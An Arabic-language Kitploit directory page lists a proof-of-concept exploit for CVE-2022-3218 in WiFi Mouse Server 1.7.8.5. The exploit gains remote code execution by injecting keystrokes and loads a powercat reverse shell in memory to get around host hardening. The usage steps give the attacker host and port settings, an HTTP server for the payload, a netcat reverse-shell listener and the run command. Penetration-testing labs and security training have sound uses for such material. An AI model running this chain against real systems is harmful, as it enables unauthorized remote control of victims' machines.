Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
MouseServer-1.7.8.5-RCE — استغلال PoC لثغرة CVE-2022-3218 يستهدف WiFi Mouse Server 1.7.8.5، ويحقّق تنفيذًا عن بُعد (RCE) عبر حقن ضغطات المفاتيح وتسليم حمولة PowerShell في الذاكرة للمختبرات المحصّنة. | Kitploit
أدوات/GitHubGitHub/mermehr/mouseserver-1.7.8.5-rce
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubmermehr/mouseserver-1.7.8.5-rce

MouseServer-1.7.8.5-RCE

استغلال PoC لثغرة CVE-2022-3218 يستهدف WiFi Mouse Server 1.7.8.5، ويحقّق تنفيذًا عن بُعد (RCE) عبر حقن ضغطات المفاتيح وتسليم حمولة PowerShell في الذاكرة للمختبرات المحصّنة.

عرض المستودع
منذ 5 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WiFi Mouse Server 1.7.8.5 - RCE

استغلال Python 3 مُحسَّن (PoC) لثغرة WiFi Mouse Server v1.7.8.5. يستغل هذا السكربت ثغرة بروتوكولية كامنة لتحقيق تنفيذ أوامر عن بُعد (RCE) عبر حقن ضغطات المفاتيح تلقائيًا.

تم تعديل هذا الإصدار وضبطه بشكل صريح لبيئات المختبرات حيث تفشل الاستغلالات العامة التقليدية بسبب قيود تحصين المضيف (مثل تقييد تنفيذ certutil.exe أو منع تنزيل الملفات الثنائية).

السياق والإسناد

  • يُتتبَّع تاريخيًا جنبًا إلى جنب مع النتائج المجتمعية مثل CVE-2022-3218.
  • مستوحى بشكل كبير ومُكيَّف من الاستغلال العام الأصلي للمُطوِّر RedHatAugust، Exploit-DB #49601.
  • يعتمد سكربت Exploit-DB الأصلي على cmd.exe و certutil.exe لإسقاط ملف تنفيذي خبيث على القرص. في هياكل الامتحانات/المختبرات المُحصَّنة أو الحديثة، غالبًا ما تكون هذه الأدوات (LOLBins) مقيدة أو محظورة بواسطة نهج المجموعة المحلي. ينقل هذا الإصدار المعدَّل المتجه بالكامل إلى الذاكرة عبر نموذج ويب PowerShell باستخدام powercat.ps1.

الاستخدام

تكوين الحمولة (داخل السكربت)

افتح السكربت وحدِّث متغيرات الإعداد في أعلى الملف وفقًا لإعدادات بيئتك المحلية:

root@kitploit:~
rhost = sys.argv[1]
lhost = "192.168.45.167"  # عنوان المهاجم/كالي الخاص بك
lport = "443"             # منفذ مستمع Netcat لديك
http_port = "80"          # منفذ خادم HTTP المحلي الذي يستضيف powercat

إعداد مستمعي المضيف

استضف powercat.ps1 على جهاز المهاجم المحلي داخل مجلد:

root@kitploit:~
python3 -m http.server 80

في نافذة طرفية منفصلة، أنشئ مستمع الصدفة العكسية على الـ lport المُعد:

root@kitploit:~
nc -lvnp 443

تشغيل الاستغلال

نفِّذ السكربت ضد عنوان IP للجهاز الهدف:

root@kitploit:~
python3 exploit.py <TARGET-IP>
تنزيل الأداة